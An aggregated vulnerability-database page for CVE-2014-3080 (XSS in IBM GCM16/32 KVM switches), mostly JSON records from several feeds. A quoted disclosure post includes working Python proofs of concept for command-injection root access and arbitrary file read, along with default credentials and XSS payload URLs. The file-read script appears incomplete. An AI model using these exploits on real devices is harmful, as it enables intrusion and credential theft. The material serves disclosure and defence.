CVE-2014-3080 (GCVE-0-2014-3080)

Vulnerability from cvelistv5 – Published: 2014-08-17 23:00 – Updated: 2024-08-06 10:35

Summary

Severity ?

No CVSS data available.

CWE

Assigner

ibm

References

URL

Tags

	http://packetstormsecurity.com/files/127543/IBM-1…	x_refsource_MISC
	http://www.securityfocus.com/bid/68777	vdb-entryx_refsource_BID
	http://www.exploit-db.com/exploits/34132/	exploitx_refsource_EXPLOIT-DB
	http://www.ibm.com/support/entry/portal/docdispla…	x_refsource_CONFIRM
	http://seclists.org/fulldisclosure/2014/Jul/113	mailing-listx_refsource_FULLDISC
	https://exchange.xforce.ibmcloud.com/vulnerabilit…	vdb-entryx_refsource_XF

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T10:35:55.974Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/127543/IBM-1754-GCM-KVM-Code-Execution-File-Read-XSS.html"
          },
          {
            "name": "68777",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/68777"
          },
          {
            "name": "34132",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "http://www.exploit-db.com/exploits/34132/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983"
          },
          {
            "name": "20140721 IBM GCM16/32 v1.20.0.22575 vulnerabilities",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://seclists.org/fulldisclosure/2014/Jul/113"
          },
          {
            "name": "ibm-gcm-cve20143080-xss(93929)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/93929"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2014-07-14T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "Multiple cross-site scripting (XSS) vulnerabilities on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to kvm.cgi or (2) the key parameter to avctalert.php."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-08-28T12:57:01.000Z",
        "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
        "shortName": "ibm"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/127543/IBM-1754-GCM-KVM-Code-Execution-File-Read-XSS.html"
        },
        {
          "name": "68777",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/68777"
        },
        {
          "name": "34132",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "http://www.exploit-db.com/exploits/34132/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983"
        },
        {
          "name": "20140721 IBM GCM16/32 v1.20.0.22575 vulnerabilities",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://seclists.org/fulldisclosure/2014/Jul/113"
        },
        {
          "name": "ibm-gcm-cve20143080-xss(93929)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/93929"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "psirt@us.ibm.com",
          "ID": "CVE-2014-3080",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Multiple cross-site scripting (XSS) vulnerabilities on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to kvm.cgi or (2) the key parameter to avctalert.php."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://packetstormsecurity.com/files/127543/IBM-1754-GCM-KVM-Code-Execution-File-Read-XSS.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/127543/IBM-1754-GCM-KVM-Code-Execution-File-Read-XSS.html"
            },
            {
              "name": "68777",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/68777"
            },
            {
              "name": "34132",
              "refsource": "EXPLOIT-DB",
              "url": "http://www.exploit-db.com/exploits/34132/"
            },
            {
              "name": "http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983",
              "refsource": "CONFIRM",
              "url": "http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983"
            },
            {
              "name": "20140721 IBM GCM16/32 v1.20.0.22575 vulnerabilities",
              "refsource": "FULLDISC",
              "url": "http://seclists.org/fulldisclosure/2014/Jul/113"
            },
            {
              "name": "ibm-gcm-cve20143080-xss(93929)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/93929"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
    "assignerShortName": "ibm",
    "cveId": "CVE-2014-3080",
    "datePublished": "2014-08-17T23:00:00.000Z",
    "dateReserved": "2014-04-29T00:00:00.000Z",
    "dateUpdated": "2024-08-06T10:35:55.974Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2014-3080\",\"sourceIdentifier\":\"psirt@us.ibm.com\",\"published\":\"2014-08-17T23:55:06.853\",\"lastModified\":\"2025-04-12T10:46:40.837\",\"vulnStatus\":\"Deferred\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Multiple cross-site scripting (XSS) vulnerabilities on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to kvm.cgi or (2) the key parameter to avctalert.php.\"},{\"lang\":\"es\",\"value\":\"M\u00faltiples vulnerabiidades de XSS en los switches IBM GCM16 y GCM32 Global Console Manager con firmware anterior a 1.20.20.23447 permiten a atacantes remotos inyectar secuencias de comandos web o HTML arbitrarios a trav\u00e9s de (1) la cadena de consulta en kvm.cgi o (2) el par\u00e1metro key en avctalert.php.\"}],\"metrics\":{\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:M/Au:N/C:N/I:P/A:N\",\"baseScore\":4.3,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"MEDIUM\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"NONE\"},\"baseSeverity\":\"MEDIUM\",\"exploitabilityScore\":8.6,\"impactScore\":2.9,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":true}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:global_console_manager_16_firmware:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"1.20.0.22575\",\"matchCriteriaId\":\"5A20A7D6-73FB-4E05-9D73-C23E20513AE5\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:global_console_manager_32_firmware:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"1.20.0.22575\",\"matchCriteriaId\":\"40D05CCE-C686-4D08-B4FE-B5C02DFA5EE3\"}]}]}],\"references\":[{\"url\":\"http://packetstormsecurity.com/files/127543/IBM-1754-GCM-KVM-Code-Execution-File-Read-XSS.html\",\"source\":\"psirt@us.ibm.com\"},{\"url\":\"http://seclists.org/fulldisclosure/2014/Jul/113\",\"source\":\"psirt@us.ibm.com\"},{\"url\":\"http://www.exploit-db.com/exploits/34132/\",\"source\":\"psirt@us.ibm.com\",\"tags\":[\"Exploit\"]},{\"url\":\"http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983\",\"source\":\"psirt@us.ibm.com\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"http://www.securityfocus.com/bid/68777\",\"source\":\"psirt@us.ibm.com\",\"tags\":[\"Exploit\"]},{\"url\":\"https://exchange.xforce.ibmcloud.com/vulnerabilities/93929\",\"source\":\"psirt@us.ibm.com\"},{\"url\":\"http://packetstormsecurity.com/files/127543/IBM-1754-GCM-KVM-Code-Execution-File-Read-XSS.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://seclists.org/fulldisclosure/2014/Jul/113\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www.exploit-db.com/exploits/34132/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\"]},{\"url\":\"http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"http://www.securityfocus.com/bid/68777\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\"]},{\"url\":\"https://exchange.xforce.ibmcloud.com/vulnerabilities/93929\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"}]}}"
  }
}

GHSA-7QRX-H23W-MQRJ

Vulnerability from github – Published: 2022-05-17 01:25 – Updated: 2025-04-12 12:36

Details

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2014-3080"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2014-08-17T23:55:00Z",
    "severity": "MODERATE"
  },
  "details": "Multiple cross-site scripting (XSS) vulnerabilities on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to kvm.cgi or (2) the key parameter to avctalert.php.",
  "id": "GHSA-7qrx-h23w-mqrj",
  "modified": "2025-04-12T12:36:39Z",
  "published": "2022-05-17T01:25:48Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-3080"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/93929"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/127543/IBM-1754-GCM-KVM-Code-Execution-File-Read-XSS.html"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2014/Jul/113"
    },
    {
      "type": "WEB",
      "url": "http://www.exploit-db.com/exploits/34132"
    },
    {
      "type": "WEB",
      "url": "http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/68777"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

FKIE_CVE-2014-3080

Vulnerability from fkie_nvd - Published: 2014-08-17 23:55 - Updated: 2025-04-12 10:46

Severity ?

Summary

References

URL	Tags
psirt@us.ibm.com	http://packetstormsecurity.com/files/127543/IBM-1754-GCM-KVM-Code-Execution-File-Read-XSS.html
psirt@us.ibm.com	http://seclists.org/fulldisclosure/2014/Jul/113
psirt@us.ibm.com	http://www.exploit-db.com/exploits/34132/	Exploit
psirt@us.ibm.com	http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983	Vendor Advisory
psirt@us.ibm.com	http://www.securityfocus.com/bid/68777	Exploit
psirt@us.ibm.com	https://exchange.xforce.ibmcloud.com/vulnerabilities/93929
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/127543/IBM-1754-GCM-KVM-Code-Execution-File-Read-XSS.html
af854a3a-2127-422b-91ae-364da2661108	http://seclists.org/fulldisclosure/2014/Jul/113
af854a3a-2127-422b-91ae-364da2661108	http://www.exploit-db.com/exploits/34132/	Exploit
af854a3a-2127-422b-91ae-364da2661108	http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/68777	Exploit
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/93929

Impacted products

	Vendor	Product	Version
	ibm	global_console_manager_16_firmware	*
	ibm	global_console_manager_32_firmware	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:ibm:global_console_manager_16_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "5A20A7D6-73FB-4E05-9D73-C23E20513AE5",
              "versionEndIncluding": "1.20.0.22575",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:ibm:global_console_manager_32_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "40D05CCE-C686-4D08-B4FE-B5C02DFA5EE3",
              "versionEndIncluding": "1.20.0.22575",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Multiple cross-site scripting (XSS) vulnerabilities on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to kvm.cgi or (2) the key parameter to avctalert.php."
    },
    {
      "lang": "es",
      "value": "M\u00faltiples vulnerabiidades de XSS en los switches IBM GCM16 y GCM32 Global Console Manager con firmware anterior a 1.20.20.23447 permiten a atacantes remotos inyectar secuencias de comandos web o HTML arbitrarios a trav\u00e9s de (1) la cadena de consulta en kvm.cgi o (2) el par\u00e1metro key en avctalert.php."
    }
  ],
  "id": "CVE-2014-3080",
  "lastModified": "2025-04-12T10:46:40.837",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 4.3,
          "confidentialityImpact": "NONE",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ]
  },
  "published": "2014-08-17T23:55:06.853",
  "references": [
    {
      "source": "psirt@us.ibm.com",
      "url": "http://packetstormsecurity.com/files/127543/IBM-1754-GCM-KVM-Code-Execution-File-Read-XSS.html"
    },
    {
      "source": "psirt@us.ibm.com",
      "url": "http://seclists.org/fulldisclosure/2014/Jul/113"
    },
    {
      "source": "psirt@us.ibm.com",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.exploit-db.com/exploits/34132/"
    },
    {
      "source": "psirt@us.ibm.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983"
    },
    {
      "source": "psirt@us.ibm.com",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.securityfocus.com/bid/68777"
    },
    {
      "source": "psirt@us.ibm.com",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/93929"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://packetstormsecurity.com/files/127543/IBM-1754-GCM-KVM-Code-Execution-File-Read-XSS.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://seclists.org/fulldisclosure/2014/Jul/113"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.exploit-db.com/exploits/34132/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.securityfocus.com/bid/68777"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/93929"
    }
  ],
  "sourceIdentifier": "psirt@us.ibm.com",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

GSD-2014-3080

Vulnerability from gsd - Updated: 2023-12-13 01:22

Details

Aliases

CVE-2014-3080

Aliases

CVE-2014-3080

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2014-3080",
    "description": "Multiple cross-site scripting (XSS) vulnerabilities on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to kvm.cgi or (2) the key parameter to avctalert.php.",
    "id": "GSD-2014-3080",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2014-3080"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2014-3080"
      ],
      "details": "Multiple cross-site scripting (XSS) vulnerabilities on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to kvm.cgi or (2) the key parameter to avctalert.php.",
      "id": "GSD-2014-3080",
      "modified": "2023-12-13T01:22:53.092801Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "psirt@us.ibm.com",
        "ID": "CVE-2014-3080",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "n/a",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "Multiple cross-site scripting (XSS) vulnerabilities on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to kvm.cgi or (2) the key parameter to avctalert.php."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "n/a"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "http://packetstormsecurity.com/files/127543/IBM-1754-GCM-KVM-Code-Execution-File-Read-XSS.html",
            "refsource": "MISC",
            "url": "http://packetstormsecurity.com/files/127543/IBM-1754-GCM-KVM-Code-Execution-File-Read-XSS.html"
          },
          {
            "name": "68777",
            "refsource": "BID",
            "url": "http://www.securityfocus.com/bid/68777"
          },
          {
            "name": "34132",
            "refsource": "EXPLOIT-DB",
            "url": "http://www.exploit-db.com/exploits/34132/"
          },
          {
            "name": "http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983",
            "refsource": "CONFIRM",
            "url": "http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983"
          },
          {
            "name": "20140721 IBM GCM16/32 v1.20.0.22575 vulnerabilities",
            "refsource": "FULLDISC",
            "url": "http://seclists.org/fulldisclosure/2014/Jul/113"
          },
          {
            "name": "ibm-gcm-cve20143080-xss(93929)",
            "refsource": "XF",
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/93929"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:ibm:global_console_manager_16_firmware:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "1.20.0.22575",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:ibm:global_console_manager_32_firmware:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "1.20.0.22575",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "psirt@us.ibm.com",
          "ID": "CVE-2014-3080"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "Multiple cross-site scripting (XSS) vulnerabilities on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to kvm.cgi or (2) the key parameter to avctalert.php."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-79"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "34132",
              "refsource": "EXPLOIT-DB",
              "tags": [
                "Exploit"
              ],
              "url": "http://www.exploit-db.com/exploits/34132/"
            },
            {
              "name": "http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983",
              "refsource": "CONFIRM",
              "tags": [
                "Vendor Advisory"
              ],
              "url": "http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983"
            },
            {
              "name": "20140721 IBM GCM16/32 v1.20.0.22575 vulnerabilities",
              "refsource": "FULLDISC",
              "tags": [],
              "url": "http://seclists.org/fulldisclosure/2014/Jul/113"
            },
            {
              "name": "http://packetstormsecurity.com/files/127543/IBM-1754-GCM-KVM-Code-Execution-File-Read-XSS.html",
              "refsource": "MISC",
              "tags": [],
              "url": "http://packetstormsecurity.com/files/127543/IBM-1754-GCM-KVM-Code-Execution-File-Read-XSS.html"
            },
            {
              "name": "68777",
              "refsource": "BID",
              "tags": [
                "Exploit"
              ],
              "url": "http://www.securityfocus.com/bid/68777"
            },
            {
              "name": "ibm-gcm-cve20143080-xss(93929)",
              "refsource": "XF",
              "tags": [],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/93929"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "cvssV2": {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "integrityImpact": "PARTIAL",
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          "exploitabilityScore": 8.6,
          "impactScore": 2.9,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "MEDIUM",
          "userInteractionRequired": true
        }
      },
      "lastModifiedDate": "2017-08-29T01:34Z",
      "publishedDate": "2014-08-17T23:55Z"
    }
  }
}

VAR-201408-0279

Vulnerability from variot - Updated: 2025-04-13 23:05

Multiple cross-site scripting (XSS) vulnerabilities on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to kvm.cgi or (2) the key parameter to avctalert.php. IBM 1754 GCM16 and GCM32 Global Console Managers are prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. The following versions are vulnerable: IBM 1754 GCM16 Global Console Manager running firmware 1.20.0.22575 and prior IBM 1754 GCM32 Global Console Manager running firmware 1.20.0.22575 and prior. IBM 1754 GCM16 and GCM32 Global Console Managers (GCM) are both 1754 series KVM switch products of IBM Corporation in the United States. The product supports AES encryption, LDAP and smart card/common access card (CAC) readers and more, enabling centralized authentication and local or remote system access. The vulnerability stems from insufficient filtering of the 'query' string in the kvm.cgi file and insufficient filtering of the 'key' parameter in the avctalert.php script . Product description The IBM 1754 GCM family provides KVM over IP and serial console management technology in a single appliance. Versions v1.20.0.22575 and prior are vulnerables. Note that this vulnerability is also present in some DELL and probably other vendors of this rebranded KVM. I contacted Dell but no response has been received.

*1. Remote code execution * CVEID: CVE-2014-2085 Description: Improperly sanitized input may allow a remote authenticated attacker to perform remote code execution on the GCM KVM switch. PoC of this vulnerability:

!/usr/bin/python"""

Exploit for Avocent KVM switch v1.20.0.22575. Remote code execution with privilege elevation. SessionId (avctSessionId) is neccesary for this to work, so you need a valid user. Default user is "Admin" with blank password. After running exploit, connect using telnet to device with user target (pass: target) then do "/tmp/su -" to gain root (password "root") alex.a.bravo@gmail.com """

from StringIO import StringIO import pycurl import os

sessid = "1111111111" target = "192.168.0.10"

durl = "https://" + target + "/systest.php?lpres=;%20/usr/ sbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod% 206755%20/tmp/su%20;"

storage = StringIO() c = pycurl.Curl() c.setopt(c.URL, durl) c.setopt(c.SSL_VERIFYPEER,0) c.setopt(c.SSL_VERIFYHOST,0) c.setopt(c.WRITEFUNCTION,storage.write) c.setopt(c.COOKIE,'avctSessionId=' + sessid)

try: print "[] Sending GET to " + target + " with session id " + sessid + "..." c.perform() c.close() except: print "" finally: print "[] Done" print "[] Trying telnet..." print "[] Login as target/target, then do /tmp/su - and enter password \"root\"" os.system("telnet " + target)

*2. Arbitrary file read * CVEID: CVE-2014-3081 Description: This device allows any authenticated user to read arbitrary files. Files can be anywhere on the target.

PoC of this vulnerability:

!/usr/bin/python

""" This exploit for Avocent KVM switch v1.20.0.22575 allows an attacker to read arbitrary files on device. SessionId (avctSessionId) is neccesary for this to work, so you need a valid user. alex.a.bravo@gmail.com """

from StringIO import StringIO import pycurl

sessid = "1111111111" target = "192.168.0.10" file = "/etc/IBM_user.dat"

durl = "https://" + target + "/prodtest.php?engage=video_ bits&display=results&filename=" + file

try: c.perform() c.close() except: print ""

content = storage.getvalue() print content.replace("","").replace("","")

3. Cross site scripting non-persistent CVEID: CVE-2014-3080 Description: System is vulnerable to cross-site scripting, caused by improper validation of user-supplied input.

Examples: http://kvm/kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E https://kvm/avctalert.php?arg1=dadadasdasd&arg2=dasdasdas&key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E

Vendor Response: IBM release 1.20.20.23447 firmware

Timeline: 2014-05-20 - Vendor (PSIRT) notified 2014-05-21 - Vendor assigns internal ID 2014-07-16 - Patch Disclosed 2014-07-17 - Vulnerability disclosed

External Information: Info about the vulnerability (spanish): http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html IBM Security Bulletin: http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983

--

Alejandro Alvarez Bravo alex.a.bravo@gmail.com

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
